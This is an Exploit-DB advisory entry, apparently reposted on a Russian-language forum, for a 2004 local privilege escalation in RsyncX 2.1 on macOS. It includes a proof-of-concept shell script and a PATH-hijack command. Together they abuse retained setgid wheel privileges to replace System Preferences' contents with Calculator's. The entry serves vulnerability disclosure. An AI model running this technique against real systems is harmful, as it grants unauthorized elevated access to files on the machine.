- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24608
- Проверка EDB
-
- Пройдено
- Автор
- MATT JOHNSTON
- Тип уязвимости
- LOCAL
- Платформа
- OSX
- CVE
- N/A
- Дата публикации
- 2004-09-17
MacOSXLabs RsyncX 2.1 - Local Privilege Escalation
Код:
source: https://www.securityfocus.com/bid/11211/info
It is reported that RsyncX is prone to a local privilege escalation vulnerability.
RsyncX is installed setuid root and setgid wheel. It is reported that RsyncX drops root privileges properly but fails to drop setgid wheel privileges before executing a third party binary.
A local attacker may exploit this vulnerability to execute arbitrary code with group wheel privileges.
The following example is available:
First, make a backup of System\ Preferences.app
Create an executable file ~/bin/defaults with contents of:
=============================
#!/bin/sh
mv "/Applications/System Preferences.app/Contents" "/Applications/System Preferences.app/oldcont"
cp -r "/Applications/Calculator.app/Contents" "/Applications/System Preferences.app/Contents"
=============================
Then run RsyncX with ~/bin in your path:
PATH=~/bin:$PATH /Applications/Utilities/RsyncX.app/Contents/MacOS/RsyncX
Click on System Preferences, and is now a calculator.- Источник
- www.exploit-db.com
